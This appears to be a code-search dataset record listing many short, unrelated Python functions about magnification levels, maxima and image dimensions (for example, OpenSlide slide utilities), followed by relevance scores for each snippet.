[ "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def get_mag_for_size(slide, size):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = np.average([max_dim/size_dim for max_dim, size_dim in zip(max_size, size)])\n return max_mag/downsample", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def get_size_for_mag(slide, mag):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = max_mag/mag\n return [np.int(np.round(dim/downsample)) for dim in max_size]", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def get_level_for_mag(slide, mag):\n level_mags_rounded = list(np.round(level_mags(slide), decimals = 2))\n if mag in level_mags_rounded:\n return level_mags_rounded.index(mag)\n else: \n return None", "def get_level_mag(slide, level):\n return level_mags(slide)[level]", "def get_mag(self):\n raise NotImplementedError", "def level_mags(slide):\n return [highest_mag(slide)/downsample for downsample in slide.level_downsamples]", "def largestResolution(resolutions):\n return resolutions[0]", "def getNativeMagnification(self):\n return self._nativeMagnification.copy()", "def _select_largest_photo(self, sizes):\n\n max_size = 0\n photo = ''\n for size in sizes:\n w = size['width']\n h = size['height']\n if w * h >= max_size:\n max_size = w * h\n photo = size['url']\n return photo", "def read_slide_at_mag(slide, mag):\n exact_level = get_level_for_mag(slide, mag)\n if exact_level is not None:\n return slide.read_region((0,0), exact_level, get_level_size(slide, exact_level))\n else:\n max_size = slide.dimensions\n region_size = tuple(get_size_for_mag(slide, mag))\n downsample = np.average([max_dim/region_dim for max_dim, region_dim in zip(max_size, region_size)])\n best_level = slide.get_best_level_for_downsample(downsample)\n best_level_size = get_level_size(slide, best_level)\n best_level_img = slide.read_region((0,0), best_level, best_level_size)\n return best_level_img.resize(region_size, resample = Image.BICUBIC)", "def maxResolution(self,wave = None):\n\n d = 2000.0*self.height*math.tan(self.angle/2) # Max pathlength in microns.\n dn = self.n.getDerivative(wave) # dn/dy of materail\n return d*dn #", "def max_scale_image(self):\n maximum = np.argmax(self.transform, 0)\n return self.scale_array[maximum] * (self.support.sum(0) > 0)", "def sort_maxside(sprite):\n return max(sprite.width, sprite.height)", "def _get_max_estimated_bandit(self)->Bandit:\n # print(\"mus - \", self.mu)\n # print(\"actions - \", np.argmax(self.mu))\n unique, counts = np.unique(self.mu, return_counts=True)\n lens = counts[np.argmax(unique)] \n if lens>1: # if two actions have same argmax\n # then return arbitrarily from those max ones\n maxs = list(np.array(self.bandits)[self.mu==unique[np.argmax(unique)]])\n return np.random.choice(maxs)\n # otherwise return the max one\n return self.bandits[np.argmax(self.mu)]", "def getImageMax(self):\n fname = '%s::%s'%(self.__class__.__name__, self.getImageMax.__name__)\n if (not self.lhaveImage):\n print(\"%s: DSM image not yet computed\"%fname)\n return None, None\n maxIndex = 
c_int(1)\n maxValue = c_float(1)\n ierr = c_int(1)\n self.lib.xcloc_getImageMax(maxIndex, maxValue, ierr)\n if (ierr.value != 0):\n print(\"%s: Failed to get max value and index of DSM image\"%fname)\n return None, None\n imax = maxIndex.value - 1 # Fortran to C\n vmax = maxValue.value\n return imax, vmax", "def get_max_density(self):\n max_density = str(self.density.index(min(self.density)) + 1)\n print(max_density)\n return max_density", "def _maxAlien(self):\n maxA = 0\n for r in self._aliens:\n for y in r:\n if(y != None):\n maxA = max(maxA,y.x)\n return maxA", "def max(self):\r\n\t\treturn max(self.sample)", "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def MaxSlMsd(self):\r\n\t\treturn self._get_attribute('maxSlMsd')", "def mag(self) -> complex:\n return self.major_extent", "def get_min_mag_edge(self):\r\n\t\treturn self.min_mag", "def peak_height(self):\n return np.array([max(self.waveform[ch]) for ch in range(self.nchannels)])", "def _get_maxth(self):\n return self.__maxth", "def _get_maxth(self):\n return self.__maxth", "def _get_maxth(self):\n return self.__maxth", "def _get_maxth(self):\n return self.__maxth", "def _get_maxth(self):\n return self.__maxth", "def _get_maxth(self):\n return self.__maxth", "def findMax(img):\n\td = minMaxLoc(img)\n\treturn {\"maxVal\":d[\"maxVal\"], \"maxLoc\":d[\"maxLoc\"]}", "def _maximum(self) -> float:\n if self._type == \"power\":\n return 5.0\n elif self._type == \"setpoint\":\n return self._product.get_data_config_json()[\"_value_setpoint_max\"]\n elif self._type == \"fan1\":\n fan = 1\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n (((fan - 1) * 2) + 1)\n ]\n elif self._type == \"fan2\":\n fan = 2\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n (((fan - 1) * 2) + 1)\n ]\n elif self._type == \"fan3\":\n fan = 3\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n (((fan - 1) * 2) + 1)\n ]", "def mag2(self) -> numbers.Number:\n mv_val = self.layout.gmt_func(self.layout.adjoint_func(self.value), self.value)\n return mv_val[0]", "def get_min_mag_center(self):\r\n\t\treturn self.min_mag + self.bin_width / 2", "def get_height_of_signal_maximum(\n data, setup={}, varname=None, gate_min=None, gate_max=None):\n idx = get_index_of_signal_maximum(\n data, setup, varname, gate_min, gate_max)\n nt = range(len(idx))\n return data['alt'][nt, idx]", "def get_max_gen():\n path = os.path.join(home, 'control', 'generations')\n gens = os.listdir(path)\n gens = [int(s.split('_')[-1]) for s in gens]\n max_gen = max(gens) \n return max_gen", "def max_well(self):\n maxVal = np.max(self.get_well_depth_image())\n return maxVal", "def maximum(self):\n return self.properties.get('maximum')", "def _get_maximum(self):\n return self._maximum", "def u_max(self):\n if self._u_max is None:\n return self.uv_max\n else:\n return self._u_max", "def get_lmax_limit(self):\n\n if self.pixel == \"HEALPIX\":\n l_max_limit = 3 * self.nside - 1\n elif self.pixel == \"CAR\":\n cdelt = self.data.wcs.wcs.cdelt[1]\n l_max_limit = 360 / cdelt / 4\n return l_max_limit", "def get_max(self):\n return self.max[-1]", "def 
find_max(subimage):\r\n\tmax_val_subimage = np.nanmax(subimage)\r\n\treturn max_val_subimage", "def GetMaximum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS2_GetMaximum(self)", "def get_max_imgid(cursor: db.Cursor, table: str) -> int:\r\n res = cursor.execute(f\"SELECT MAX({cng.BBOX_DB_IMGRNR}) FROM {table}\")\r\n maxid: int = res.fetchall()[0][0]\r\n\r\n if maxid is None:\r\n return -1\r\n else:\r\n return maxid", "def rscale(mag=10.0):\n if mag > 11.5:\n return 0.5\n elif mag > 11.0:\n return 1.0\n elif mag > 10.5:\n return 1.5\n elif mag > 10.0:\n return 1.5\n elif mag > 9.5:\n return 2.0\n elif mag > 9.0:\n return 2.5\n elif mag > 8.5:\n return 3.0\n else:\n return 3.5", "def GetMaximum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL2_GetMaximum(self)", "def highest_value():\n maximum_number = 0\n for i in xrange(length):\n challenger = frames[i]\n if abs(challenger) > maximum_number:\n maximum_number = abs(challenger)\n return maximum_number", "def max_zoom(self) -> float:\n return math.log(np.min(self.canvas_size) / REGION_DIM)", "def get_rmax(self):\n return self.rmax", "def search_for_maximum(self):\n return self.maximise_aquisition(self.expected_improvement)", "def max(self):\n return self.get_first()", "def get_max_speed(self):\n if self.mot_type == 'ims':\n return self.get_par(\"max_speed\")\n elif self.mot_type == 'xps8p':\n return self.get_par(\"max_speed_xps\")\n else:\n return self.get_par(\"max_speed\")", "def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]", "def displacement_mag(self):\n print(3284 * math.pow(self.concentration, -0.158))\n\n return 3284 * math.pow(self.concentration, -0.158)", "def sim_max(sim_mats):\n return np.array(sim_mats).max(axis=0)", "def mag(self) -> float:\n return sqrt(self.sqr_mag())", "def max_flux(frame):\n return np.max(frame.fluxes[frame.radii <= max_extent_px])", "def detail(self):\n return self.uniform(\"detail\",\n self.img_scale * .05,\n self.img_scale * .2)", "def max_pwm(self):\r\n return self._max_pwm", "def zoom(self):\n res = np.max(self.metadata[\"resolution\"])\n\n if self.atlas_name == \"allen_human_500um\":\n logger.debug(\n \"ATLAS: setting zoom manually for human atlas, atlas needs fixing\"\n )\n return 350\n else:\n return 40 / res", "def getMaxMancount(self):\n return self.__size * 20", "def _get_med(self):\n return self.__med", "def get_max(self):\n current = self\n while current.hasRight(): # This is the belief that the max has to be to the right. If you can't go right either in the begining or any more\n # if current has a right this line will be set and will keep going from line 129 to 130 until there are no more rights.\n current = current.right\n # this line returns as soon there is no more rights. 
breaking out of the loop.\n return current.value", "def max(self):\n if 0 in type(self).flatten_shape(self.shape):\n raise ValueError(\"zero-size array has no maximum\")\n if self.isscalar():\n return self.defval\n # If not all blocks are set, then the tensor has an element of defval\n # somewhere.\n m = -np.inf if self.is_full() else self.defval\n for v in self.sects.values():\n try:\n m = max(m, np.max(v))\n except ValueError:\n # This block was zero-size, and has no elements.\n pass\n return m", "def IncludeMaxSlMsd(self):\r\n\t\treturn self._get_attribute('includeMaxSlMsd')", "def get_max(self):\n\t\tif self.right:\n\t\t\treturn self.right.get_max()\n\t\treturn self.value", "def max(self):\n if self.right is None:\n return self.item\n else:\n return self.right.max()", "def get_max(self):\n return self._max", "def get_max(self):\n raise NotImplementedError(\"This is an abstract method and needs to be implemented in derived classes.\")", "def get_max_cell_voltage(self): \n summary = \" \".join(self.get_summary().split())\n pattern = '\\$.... .. .*? .*? .*? .*? (.*?) . .*? .*? . . . .*?'\n maxv = float(re.findall(pattern,summary).pop())\n return maxv", "def max(self):\n\n return time_stat(self, stat=\"max\")", "def GetMaximum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUS3_GetMaximum(self)", "def Qmax(self):\n return (4 * np.pi * np.sin(self.two_theta_max()*radians/2)\n / self.wavelength)", "def max(self):\n return self._max_coords", "def _get_max_rupture_projection_radius(self):\n if self.max_radius: # already computed\n return self.max_radius\n\n # extract maximum magnitude\n max_mag, _rate = self.get_annual_occurrence_rates()[-1]\n for (np_prob, np) in self.nodal_plane_distribution.data:\n # compute rupture dimensions\n rup_length, rup_width = _get_rupture_dimensions(self, max_mag, np)\n # compute rupture width surface projection\n rup_width = rup_width * math.cos(math.radians(np.dip))\n # the projection radius is half of the rupture diagonal\n radius = math.sqrt(rup_length ** 2 + rup_width ** 2) / 2.0\n if radius > self.max_radius:\n self.max_radius = radius\n return self.max_radius", "def GetMaximum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUL3_GetMaximum(self)", "def max(self):\n return self.__max", "def density_maxima(self, samplesize=5, thresh_mod=0):\r\n filtered = ndimage.maximum_filter(self.data, size=(samplesize, samplesize, samplesize), mode=\"wrap\")\r\n\r\n threshold = filtered.mean() + thresh_mod\r\n print(f\"actual threhold value: {threshold:.2f}\")\r\n labels, num_labels = ndimage.label(filtered > threshold)\r\n\r\n # Coordinates of maxima\r\n pos = np.array(ndimage.measurements.center_of_mass(np.asarray(self.data), labels=labels,\r\n index=np.arange(1, num_labels + 1)))\r\n\r\n # Values of maxima\r\n val = np.array(ndimage.measurements.maximum(self.data, labels=labels, index=np.arange(1, num_labels + 1)))\r\n\r\n pos[:, 0] *= iCube.x[0]\r\n pos[:, 1] *= iCube.y[1]\r\n pos[:, 2] *= iCube.z[2]\r\n\r\n return pos, val", "def findMaxFactor(self):\n factorMax = 0\n factorMaxInd = ''\n for ue in list(self.ues.keys()):\n if len(self.ues[ue].bearers[0].buffer.pckts)>0 and self.ues[ue].pfFactor>factorMax:\n factorMax = self.ues[ue].pfFactor\n factorMaxInd = ue\n if factorMaxInd=='':\n ue = list(self.ues.keys())[self.ind_u]\n q = 0\n while len(self.ues[ue].bearers[0].buffer.pckts)==0 and q<len(self.ues):\n self.updIndUE()\n ue = list(self.ues.keys())[self.ind_u]\n q = q + 1\n factorMaxInd = ue\n\n return factorMaxInd", 
"def get_prior_mag(mag_dict):\n print(\"GETTING MAGNITUDE\")\n print(mag_dict)\n print(type(mag_dict))\n mag = 17\n if not isinstance(mag_dict, dict):\n print(\"Not a dictionary so using mag=17\")\n return mag\n\n for k, v in mag_dict.items():\n mag = v['mag']\n\n try:\n mag = float(mag)\n except Exception as e:\n print(str(e), \"Error getting magnitude\")\n mag = 17\n print(mag)\n return mag", "def filmHeight(self):\r\n cls = mxs.classof(self._nativePointer)\r\n height = None\r\n if cls == mxs.VRayPhysicalCamera:\r\n\r\n # TODO: Why is that wrapped in a try except?\r\n try:\r\n height = self._nativePointer.film_height\r\n except AttributeError:\r\n pass\r\n\r\n elif cls == mxs.Physical:\r\n height = self._nativePointer.film_height_mm\r\n\r\n if not height:\r\n # If we failed to get a width from a camera, return the scene aperture setting.\r\n height = self.filmWidth() * (mxs.renderPixelAspect / mxs.getRendImageAspect())\r\n\r\n return height", "def max_flux(self):\n return np.max(self.flux)", "def getZoomFactor(imageSize, maxW, maxH):\n\timageW, imageH = imageSize\n\tzoomW = float(imageW) / float(maxW)\n\tzoomH = float(imageH) / float(maxH)\n\treturn max(zoomW, zoomH)", "def max_beam_images(self):\n return self._max_beam_images", "def find_max_f():\n fmax = fmin(g, 2)\n return fmax[0]", "def get_max(self):\n return self.serie.max()", "def magnitude(x):\n return x.magnitude if hasattr(x, 'magnitude') else x", "def get_height():\n return resize.transforms[1].size", "def maxproba(proba):\r\n lenp = len(proba)\r\n m=0\r\n for i in range(0,lenp):\r\n if proba[i]>m:\r\n m=proba[i]\r\n im=i\r\n return im,m", "def find_max(ls):\n\n if len(ls) == 1:\n return ls[0]\n elif len(ls) == 2:\n return ls[0] if ls[0] > ls[1] else ls[1]\n else:\n mid = len(ls) // 2\n m1 = find_max(ls[0:mid])\n m2 = find_max(ls[mid:])\n return m1 if m1 > m2 else m2", "def GetMaximum(self):\n return _itkStatisticsImageFilterPython.itkStatisticsImageFilterIUC2_GetMaximum(self)", "def find_max(self):\r\n maxVal = self.items[1]\r\n if maxVal is None:\r\n return None\r\n \r\n for i in range(1,len(self.items)):\r\n if self.items[i] is not None:\r\n if self.items[i] > maxVal:\r\n maxVal = self.items[i]\r\n return maxVal", "def argMax(self):\n if len(self.keys()) == 0: return None\n all = list(self.items())\n values = [x[1] for x in all]\n maxIndex = values.index(max(values))\n return all[maxIndex][0]", "def get_maximum ( self, object ):\n return self.maximum", "def resolution(self):\n return Prism.resolution(self,self.beam,self.wavelength)", "def large_image(self) -> Optional[str]:\n return pulumi.get(self, \"large_image\")", "def max(self):\n max = 0\n a = self.array_form\n for i in xrange(len(a)):\n if a[i] != i and a[i] > max:\n max = a[i]\n return max" ]
[ "0.7143382", "0.6984062", "0.6947595", "0.6700194", "0.6502702", "0.6465279", "0.6439392", "0.6389368", "0.62770873", "0.62758964", "0.6203424", "0.6182897", "0.6060569", "0.6010728", "0.6000861", "0.59334785", "0.5931892", "0.59017086", "0.5889821", "0.58670044", "0.584315", "0.5836564", "0.5819528", "0.58193827", "0.5767667", "0.57545245", "0.57338196", "0.57338196", "0.57338196", "0.57338196", "0.57338196", "0.57338196", "0.5732309", "0.5731987", "0.5663565", "0.5642731", "0.5636096", "0.5597078", "0.5573451", "0.55569696", "0.5552699", "0.5549281", "0.5542545", "0.55348825", "0.5518305", "0.5510751", "0.5508867", "0.5480722", "0.54769933", "0.5470182", "0.5468581", "0.5465213", "0.5463161", "0.5460845", "0.54591256", "0.54568875", "0.54559207", "0.5455431", "0.5454881", "0.5447061", "0.54389954", "0.5431356", "0.5430824", "0.54300654", "0.54294497", "0.54282445", "0.5423922", "0.5410876", "0.5387469", "0.5379711", "0.53593296", "0.53570735", "0.53563696", "0.53462887", "0.53331196", "0.53255486", "0.5323764", "0.5313361", "0.5294098", "0.5291997", "0.52792776", "0.5272223", "0.5265786", "0.5258698", "0.5257062", "0.52568156", "0.5255734", "0.5252752", "0.52469915", "0.5246549", "0.5244111", "0.5242065", "0.52387273", "0.5235481", "0.52347136", "0.5234382", "0.523364", "0.5230497", "0.5228626", "0.52204144" ]
0.8554771
0
Returns the magnification for each level in a slide
def level_mags(slide): return [highest_mag(slide)/downsample for downsample in slide.level_downsamples]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_level_mag(slide, level):\n return level_mags(slide)[level]", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def get_level_for_mag(slide, mag):\n level_mags_rounded = list(np.round(level_mags(slide), decimals = 2))\n if mag in level_mags_rounded:\n return level_mags_rounded.index(mag)\n else: \n return None", "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def get_size_for_mag(slide, mag):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = max_mag/mag\n return [np.int(np.round(dim/downsample)) for dim in max_size]", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def get_mag_for_size(slide, size):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = np.average([max_dim/size_dim for max_dim, size_dim in zip(max_size, size)])\n return max_mag/downsample", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def get_level_size(slide, level):\n return slide.level_dimensions[level]", "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def read_slide_at_mag(slide, mag):\n exact_level = get_level_for_mag(slide, mag)\n if exact_level is not None:\n return slide.read_region((0,0), exact_level, get_level_size(slide, exact_level))\n else:\n max_size = slide.dimensions\n region_size = tuple(get_size_for_mag(slide, mag))\n downsample = np.average([max_dim/region_dim for max_dim, region_dim in zip(max_size, region_size)])\n best_level = slide.get_best_level_for_downsample(downsample)\n best_level_size = get_level_size(slide, best_level)\n best_level_img = slide.read_region((0,0), best_level, best_level_size)\n return best_level_img.resize(region_size, resample = Image.BICUBIC)", "def get_illustrations(self):\n \n temp=[[\"middle\",[],0,0],[\"middle\",[],0,0],[\"center\",[],0,0]]\n for pic in self.illustrations.all():\n \n if pic.position==\"L\":\n temp[0][1].append(pic)\n temp[0][2]=max(temp[0][2],pic.width)\n temp[0][3]+=pic.height\n elif pic.position==\"R\":\n temp[1][1].append(pic)\n temp[1][2]=max(temp[1][2],pic.width)\n temp[1][3]+=pic.height\n else:\n temp[2][1].append(pic)\n temp[2][2]+=pic.width\n temp[2][3]=max(temp[2][3],pic.height)\n temp[0][3]=max(temp[0][3],temp[1][3])\n temp[1][3]=temp[0][3]\n if len(temp[2][1])>0:\n pos = temp[2][1][0].position\n if pos == \"BR\":\n temp[2][0] = \"right\"\n elif pos == \"BL\":\n temp[2][0] = \"left\"\n for i in range(2):\n if len(temp[i][1])>0:\n pos = temp[i][1][0].position\n if pos in [\"RT\",\"LT\"]:\n temp[i][0] = \"top\"\n elif pos in [\"RB\",\"LB\"]:\n temp[i][0] = \"bottom\"\n self.text_size=(-temp[0][2]-temp[1][2],-temp[2][3])\n print(temp)\n return temp", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def 
get_mag(self):\n raise NotImplementedError", "def _magsamples(self):\n if self._derived_properties[\"magsamples\"] is None:\n if self.lbda is None:\n raise AttributeError(\"lbda not set.\")\n self.derive_magsamples()\n \n return self._derived_properties[\"magsamples\"]", "def extract_level_from_name(self):\n images = glob.glob(os.path.join(self.frame_dir, '*'))\n level = []\n for i, im in enumerate(images):\n base, tail = os.path.split(im)\n name = tail.split('.')[-2]\n number = name.split('_')[-1]\n level.append(float(number))\n return np.array(level)", "def medoidMosaic(self,collection):\n \n\t\t# calculate the median of temp band\n\t\tthermal = ee.ImageCollection(collection.select(['thermal'])).median()\n \n\t\tcollection = collection.select(self.env.divideBands)\n\n\t\tbandNames = self.env.divideBands;\n\t\tbandNumbers = ee.List.sequence(1,bandNames.length());\n \n\t\t# calculate medion\n\t\tmedian = ee.ImageCollection(collection).median()\n \n\t\tdef subtractmedian(img):\n\t\t\tdiff = ee.Image(img).subtract(median).pow(ee.Image.constant(2));\n\t\t\treturn diff.reduce('sum').addBands(img);\n \n\t\tmedoid = collection.map(subtractmedian)\n \n\t\tmedoid = ee.ImageCollection(medoid).reduce(ee.Reducer.min(bandNames.length().add(1))).select(bandNumbers,bandNames);\n \n\t\treturn medoid.addBands(thermal);", "def getNativeMagnification(self):\n return self._nativeMagnification.copy()", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def getMagnitudes(self):\n return self._bmag, self._vmag, self._jmag, self._hmag, self._kmag", "def load_slide(self, fileName):\n image = open_slide(fileName)\n dims = image.level_dimensions\n ratio = np.array(image.level_dimensions[0])/np.array(image.level_dimensions[-1])\n\n return image, dims, ratio", "def setMagnificationsInTiltSeries(self, TiltSeries_):\n kk = 0\n for proj in TiltSeries_._ProjectionList._list:\n proj.setAlignmentMagnification(self._alignmentMagnifications[kk])\n kk = kk + 1", "def detail(self):\n return self.uniform(\"detail\",\n self.img_scale * .05,\n self.img_scale * .2)", "def add_mosaics(self):\n for tree in self.mosaictrees:\n self.add_mosaic(tree, -1)", "def getMagnificationsFromTiltSeries(self, TiltSeries_):\n # initialize alignment in seperate array - easier for optimization\n self._alignmentMagnifications = len(TiltSeries_._ProjectionList._list) * [1.]\n for (kk, proj) in enumerate(TiltSeries_._ProjectionList._list):\n self._alignmentMagnifications[kk] = proj.getAlignmentMagnification()\n return self._alignmentMagnifications", "def _get_med(self):\n return self.__med", "def tile_gen_at_mag(wsi, mag, tile_size):\n #Get size of WSI at Level 0 (Max Magnification)\n x0, y0 = wsi.level_dimensions[0]\n #Get size of WSI at the mag we want\n x_mag, y_mag = get_size_for_mag(wsi, mag)\n x_tiles = int(np.floor(x_mag/tile_size))\n y_tiles = int(np.floor(y_mag/tile_size))\n #Scale tile size accordingly\n scale = highest_mag(wsi)/mag\n yield (x_tiles, y_tiles)\n tiles = []\n for y in range(y_tiles):\n for x in range(x_tiles):\n x_coord = round(x*scale*tile_size)\n y_coord = round(y*scale*tile_size)\n scaled_tile_size = round(scale*tile_size)\n tile = wsi.read_region((x_coord, y_coord), 0, (scaled_tile_size, scaled_tile_size))\n yield tile.resize((tile_size, tile_size), resample = Image.BICUBIC)", "def getMagnification(self, pixelSize=0.0129, isFilter=False, erodeIter=None):\r\n\r\n if not hasattr(self, 'determinantMap'):\r\n _ = self._getDeterminantMap()\r\n\r\n if hasattr(self, 'finalPathesMarked'):\r\n 
finalPatches = self.finalPatchesMarked\r\n elif hasattr(self, 'finalPatches'):\r\n finalPatches = self.finalPatches\r\n else:\r\n self.processTrial()\r\n finalPatches = self.finalPatches\r\n\r\n magMap = 1 / self.determinantMap\r\n\r\n if isFilter:\r\n magMap = ni.filters.gaussian_filter(magMap, self.params['signMapFilterSigma'])\r\n\r\n # get mean power amplitude for all visual areas normalized by V1\r\n magDict = {}\r\n for key, patch in finalPatches.items():\r\n array = patch.array.astype(np.float)\r\n\r\n if erodeIter:\r\n array = ni.binary_erosion(array, iterations=erodeIter)\r\n\r\n area = np.sum(array)\r\n\r\n totalMag = np.sum(array * magMap)\r\n\r\n magDict.update({key: (pixelSize ** 2) * totalMag / area})\r\n\r\n return magDict", "def get_magmom_string():\n\n magmoms = []\n poscar_lines = open('POSCAR').readlines()\n elements = poscar_lines[5].split()\n amounts = poscar_lines[6].split()\n for i in range(len(elements)):\n if Element(elements[i]).is_transition_metal:\n magmoms.append('{}*6.0'.format(amounts[i]))\n else:\n magmoms.append('{}*0.5'.format(amounts[i]))\n return ' '.join(magmoms)", "def calculateRatio(levelDims):\n highestReso = np.asarray(levelDims[0])\n lowestReso = np.asarray(levelDims[-1])\n Xratio, Yratio = highestReso/lowestReso\n return (Xratio, Yratio)", "def scale_mag_1(x):\n return np.array([np.true_divide(ui, mag(x)) for ui in x])", "def get_map_size(level):\n if level < 5:\n return 5, 5\n if level < 70:\n return 10, 10\n if level < 150:\n return 25, 25\n return 50, 50", "def plot_instructions_lim_mags(self):\n return self.__plot_instructions_lim_mags", "def refmags(self):\n return self.__ref_mags", "def _get_depth_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Depth/0.125/\"\n else:\n return \"Depth/0.25/\"\n else: \n return \"Depth/\"", "def medias(self):\r\n return Medias(self)", "def galaxy(img):\n return img[420:490, 710:770]", "def getModifiers(self, img_info):\n modifiers = \"\"\n width_percent_reduction = 0\n height_percent_reduction = 0\n max_width = float(self.cfg().chatimg.max_width)\n max_height = float(self.cfg().chatimg.max_height)\n if max_width and img_info.width > max_width:\n width_percent_reduction = (img_info.width / max_width) - 1.0\n if max_height and img_info > max_height:\n height_percent_reduction = (img_info.height / max_height) - 1.0\n\n if width_percent_reduction > 0 and width_percent_reduction > height_percent_reduction:\n modifiers = \" width=\\\"%s\\\" \" % max_width\n elif height_percent_reduction > 0:\n modifiers = \" height=\\\"%d\\\" \" % max_height\n\n return modifiers", "def GetScale(self):\n ...", "def magn(names, values, data, model_key, plot_key=False):\n # Making sure number of parameters matches number of names given:\n assert len(names) == len(values), \"len(names) != len(values) in datasim.magn\"\n\n zpicks = data['zpicks']\n # Corrected absolute magnitude M of SN.\n M = values[0]\n\n# dlpc, da, integrated_zpicks, integrated_dlpc, plot_var = zodesolve.zodesolve(names, values, zpicks, model_key, plot_key)\n\n dlpc, da, plot_var = zodesolve.zodesolve(names, values, zpicks, model_key, plot_key)\n\n # Calculating apparent magnitudes of supernovae at the simulated\n # luminosity distances using the distance modulus formula.\n mag = 5 * np.log10(dlpc/10) + M\n# integrated_mag = 5 * np.log10(integrated_dlpc/10) + M\n# print('redshift =',zpicks[-1],'da =', da[-1])\n\n# # plotting interpoated data vs input and full\n# import matplotlib.pyplot as plt\n# import matplotlib as 
mpl\n# #mpl.style.use('default') # has to be switched on to set figure size\n# mpl.style.use('fivethirtyeight')\n# plt.rcParams['axes.facecolor'] = 'white'\n# plt.rcParams['figure.facecolor'] = 'white'\n# plt.rcParams['grid.color'] = 'white'\n#\n# print('integrated_zpicks',integrated_zpicks[0])\n# print('zpicks', zpicks[0])\n#\n# plt.figure()\n# plt.scatter(integrated_zpicks, integrated_mag, s=70, label='integrated', c=\"C{}\".format(0))\n# plt.plot(zpicks, mag, label='interpolated', linestyle='-', c=\"C{}\".format(1))\n# plt.legend()\n\n if plot_key:\n # Plotting evolution of parameters in the model.\n import plots\n plots.modelcheck(mag, zpicks, plot_var, model_key)\n\n return mag, da", "def scale(self):", "def difficulty(mag):\n mag = float(mag)\n if mag <= -4:\n return \"Visible in daytime.\"\n elif mag <= 6:\n return \"Visible at night.\"\n else:\n flux = mag_def(\"%s x\" % mag)\n needed_flux = mag_def(\"6 x\")\n eye_area = math.pi * (0.005**2)\n needed_power = needed_flux * eye_area\n diameter = 2 * math.sqrt(needed_power / (flux*math.pi))\n return \"%s m telescope needed.\" % diameter", "def calcMag(self):\n M = np.sum(self.config)\n return M", "def mag(self) -> complex:\n return self.major_extent", "def magnitude(x):\n return x.magnitude if hasattr(x, 'magnitude') else x", "def getMagFlux(self):\n return self.magflux", "def visualise_patches_on_slide(ps: PatchSet, vis_level: (int), project_root: Path = Path('/')) -> Image:\n assert len(ps.settings) == 1, \"The input patch set contains patches from more than one slide, or more than one patch size / level\"\n slide_settings = ps.settings[0] \n\n def convert_ps_to_thumb_level(ps, thumb_lev):\n ps_df = ps.df.copy()\n level_diff = thumb_lev - ps.settings[0].level\n ps_df.x = ps_df.x.divide(2 ** level_diff).astype(int)\n ps_df.y = ps_df.y.divide(2 ** level_diff).astype(int)\n thumb_patch_size = slide_settings.patch_size // 2 ** level_diff\n return PatchSet(ps_df, [PatchSetting(slide_settings.level, thumb_patch_size, slide_settings.slide_path, slide_settings.loader)])\n\n def create_visualisation_frame(ps_in):\n vis_frame = ps_in.df\n # TODO: ps.settings[0] as only one settings is there a neater way to do this\n vis_frame[\"x2\"] = vis_frame.x.add(ps_in.settings[0].patch_size)\n vis_frame[\"y2\"] = vis_frame.y.add(ps_in.settings[0].patch_size)\n return vis_frame\n\n with slide_settings.loader.load_slide(project_root / slide_settings.slide_path) as slide:\n thumb = slide.get_thumbnail(vis_level)\n \n thumb = Image.fromarray(np.array(thumb, dtype=np.uint8))\n ps_out = convert_ps_to_thumb_level(ps, vis_level)\n vis_frame = create_visualisation_frame(ps_out)\n\n thumbdraw = ImageDraw.Draw(thumb) \n for row in vis_frame.itertuples():\n thumbdraw.rectangle([row.x, row.y, row.x2, row.y2], fill=None, outline='black', width=1)\n \n return thumb", "def GetTextureDimensions(self):\n ...", "def my_phantomgallery( phantom_type ):\n\n if phantom_type == 'ellipses' or 